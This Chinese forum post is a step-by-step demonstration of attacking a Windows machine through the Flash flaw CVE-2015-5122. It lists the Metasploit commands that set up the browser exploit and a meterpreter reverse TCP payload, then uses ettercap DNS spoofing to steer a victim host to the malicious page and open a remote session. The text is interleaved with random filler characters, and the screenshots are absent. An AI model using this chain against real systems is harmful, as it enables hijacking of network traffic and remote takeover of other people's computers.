找回密码
 立即注册
查看: 2159|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

" a- q& x. j8 \* I; B 二、cve2015-5122漏洞实例演示虚拟机 & j5 f6 g+ {! s3 _4 a6 K5 m

, O# _1 u! ?+ y4 d& X7 z! Y. m" n$ Z7 z

- m) v$ _. f. t0 O0 j   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: % V4 V8 f3 [: v2 f* n

* i2 S9 T1 `% W

4 P0 t- n v! J9 _2 r* x search cve-2015-5122如图: & @5 o0 K; ~8 j% _. x

; s8 a' q i/ M7 h9 U6 y X' h

3 R! k: u. E6 _7 V# {7 V: T, w   , v1 \5 m$ i2 ?" S" A, E# C, u

) d" `( q5 V1 e: X+ G* S: ]

2 s7 X; q2 F \( s# V5 ~+ s; p3 {/ w 下面我们敲如下命令: ; t4 n0 m1 l! R: P: h

% j6 [7 ^3 H% T- b: o

, |: N6 ]3 I: d7 C+ Q8 Y+ w use exploit/multi/browser/adobe_flash_opaque_background_uaf 4 T0 s% o F* K/ D. \" J6 K

2 Q2 \+ g: U0 T# q6 s

, e" ?; l. H9 V4 p5 ^! F set PAYLOAD windows/meterpreter/reverse_tcp ; l' ]- t# C( `8 C5 H

5 U& R" m% \1 A( ^

# `4 V1 m) P& Z* u; X: s set LHOST 192.168.0.109 $ i4 u' Z) T/ \

; {- E s* m; u% R* F9 O" @

; [9 l. V! E% q" a, \" ^" F! j set URIPATH /                        /*根目录*/ $ b& R1 |8 o' O: V2 G! ?3 H. j Y

' _) `! w" |& T0 K9 F

9 T; G0 p! z$ G) N; H1 j X+ o- B set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 + T) ~( H i. \! Y& C; o/ }

, x) X% Q8 \" U/ x; v

2 a7 w9 W5 ~& x7 k set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ' H3 K0 @# _$ }. k0 s

. G- \) G: ]5 o) o, x K" P

4 G; w- ]* c) V 然后show options如图: 1 ]+ I) W0 R5 Q# T) T

, H& B1 G/ G7 g% _$ B' ]# u5 r# A

: o* k$ d2 N& k# C( \8 s# j; m   & |9 C' h3 _ U& H7 R* O5 L

% J2 b5 c8 e9 f! {

; q- x4 C% V/ b( F& W* q' A 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
( b& s e9 p5 a$ W3 c
& d: W/ |( i: K$ n0 B

2 W0 {0 I# Y b' [6 B& @

/ ^$ Z8 f* n7 H | 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 ) I( s G2 M; ~. U

$ e" W6 V( N" h

0 f/ O% M' v: n* }% H Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf , ]4 q; }) y. p( {7 _; {/ I, B# g

6 k* z* e; j+ U) g; e9 E# G9 J

0 {; A# P4 x/ p   % p& E9 e7 y+ |0 w

Y9 }5 n9 s* O3 q" y

" e% q b7 j1 G" K7 H 成功了,这时候我们断开ettercap,如图: ! J) Z$ U5 h# u

! z2 b; U- d$ m0 Y4 l8 `

8 f9 F2 B) `+ }" G/ j; S) J   3 A' P7 U: C y+ n% ~5 C

3 t5 {( @ `3 }

2 |6 T; M( {2 F* a7 x Screenshot如图: ( }! v' t7 a Q9 ^6 Q

+ Q; p5 V. I+ N; T! _' o

8 @8 K0 o5 Q [" Y+ u3 @8 i# j   ) B/ P `7 x1 N# v8 F

# P( u4 g5 G$ t0 B5 X' y

p: ?. Q2 `5 I- S( X% O ; t" U D5 s9 H' h" _. v

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表